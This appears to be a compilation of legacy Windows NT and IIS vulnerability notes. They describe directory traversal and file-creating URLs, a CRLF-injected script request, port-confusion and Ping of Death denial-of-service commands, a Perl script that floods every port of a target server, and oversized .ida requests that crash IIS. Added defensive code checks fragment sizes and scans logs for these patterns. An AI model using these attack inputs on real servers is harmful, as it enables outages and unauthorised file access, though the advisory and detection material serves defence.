Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/

use strict;
use Socket;
use FileHandle;
require "chat2.pl";   # chat2.pl ships with older Perl distributions: chat::open_port, chat::print, chat::close

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # don't hit known problem ports

# the original read "$port = $0", which is the script name, not the number 0
for (my $port = 0; $port < 65535; $port++)
{
    # skip the ports documented above as locking up RPCSS, inetinfo and dns
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    my $fh = chat::open_port($systemname, $port);
    next unless $fh;   # nothing listening on this port, or the connect failed
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0

Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
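As an added illustration (not part of the original notes), the arithmetic behind the crash: a 65527-byte payload plus the 8-byte ICMP header and 20-byte IP header reassembles to 65555 bytes, more than the 16-bit IPv4 total-length field allows, which is exactly the bound a hardened reassembler must check before copying fragment data. The 1500-byte MTU and the fragment layout are assumptions used to model a sending stack.

```python
# Field sizes from the IPv4 and ICMP specifications.
IPV4_MAX_DATAGRAM = 65535  # the total-length field is 16 bits
IPV4_HEADER = 20           # minimal header, no options
ICMP_HEADER = 8            # echo request header

def ping_datagram_size(payload_len):
    """Total datagram size implied by 'PING -l <payload_len>'."""
    return IPV4_HEADER + ICMP_HEADER + payload_len

def exceeds_ipv4_max(payload_len):
    """True when the echo request can only exist as fragments whose
    reassembled whole is larger than any IPv4 datagram may be."""
    return ping_datagram_size(payload_len) > IPV4_MAX_DATAGRAM

def fragment_ping(payload_len, mtu=1500):
    """Split the ICMP message into (fragment_offset_in_8_byte_units, payload_bytes)
    pairs the way a sending stack does (assumed MTU of 1500): every fragment
    but the last carries a multiple of 8 bytes that fits the MTU."""
    per_frag = (mtu - IPV4_HEADER) // 8 * 8
    total = ICMP_HEADER + payload_len
    frags, offset = [], 0
    while offset < total:
        length = min(per_frag, total - offset)
        frags.append((offset // 8, length))
        offset += length
    return frags

def reassembled_length(fragments):
    """Payload length the receiver must buffer if it trusts offset + length
    blindly, i.e. the value the vulnerable stack acted on."""
    return max(offset_units * 8 + length for offset_units, length in fragments)

def safe_to_reassemble(fragments):
    """The guard a hardened reassembler applies before copying fragment data:
    reject any fragment whose end, plus the IP header, passes 65535."""
    return all(offset_units * 8 + length + IPV4_HEADER <= IPV4_MAX_DATAGRAM
               for offset_units, length in fragments)

if __name__ == "__main__":
    for payload in (65507, 65527):
        frags = fragment_ping(payload)
        print(payload, ping_datagram_size(payload), len(frags),
              reassembled_length(frags), safe_to_reassemble(frags))
```

A 65507-byte payload is the largest that still fits, which is why it passes the guard while the documented 65527 does not.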
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a denial of service against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
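The URL shapes described in these notes (the '..\..' traversal and '>' redirection forms at the top, the relative "GET ../.." request, and the IDA/IDQ probes and oversized .ida request here) all leave a recognisable trace in web-server access records. The following detection logic is an added example, not part of the original notes; the "<method> <url> <status>" record format, the sample records and the 1024-byte length threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample records (not real logs): "<method> <url> <status>", one per
# URL shape described in the notes above, plus one ordinary request.
SAMPLE_LOG = [
    "GET /index.htm 200",
    r"GET /..\.. 200",
    r"GET /scripts..\..\scriptname 200",
    r"GET /scripts/exploit.bat>PATH\target.bat 200",
    r"GET /scripts/script_name%0A%0D>PATH\target.bat 200",
    "GET /anything.idq 404",
    "GET /" + "." * 25000 + "ida 500",
    "GET ../.. -",
]

# Assumed threshold: an .ida request longer than this is treated as the DoS form.
LONG_IDA_THRESHOLD = 1024

def classify_url(url: str) -> list:
    """Return the issue tags a single request URL matches (empty if clean)."""
    tags = []
    decoded = unquote(url)  # %0A%0D etc. become real control characters
    if re.search(r"\.\.[\\/]", decoded):
        tags.append("traversal")        # '..\' or '../' leaving the content root
    if not decoded.startswith("/"):
        tags.append("relative-uri")     # 'GET ../..', the inetinfo crash case
    if ">" in decoded:
        tags.append("output-redirect")  # '>' after a script creates/truncates a file
    if "\n" in decoded or "\r" in decoded:
        tags.append("crlf")             # %0A / %0D appended to the script name
    if re.search(r"\.id[aq]$", decoded, re.IGNORECASE):
        tags.append("ida-idq-probe")    # path-disclosure probe via IDA/IDQ
    if decoded.lower().endswith("ida") and len(decoded) > LONG_IDA_THRESHOLD:
        tags.append("long-ida")         # the ~25 KB of '.' that kills inetinfo
    return tags

def scan_log(lines) -> dict:
    """Map each offending record to its tags; clean records are omitted."""
    findings = {}
    for line in lines:
        _method, url, _status = line.split(" ", 2)
        tags = classify_url(url)
        if tags:
            findings[line] = tags
    return findings

if __name__ == "__main__":
    for record, tags in scan_log(SAMPLE_LOG).items():
        print(record[:60], tags)
```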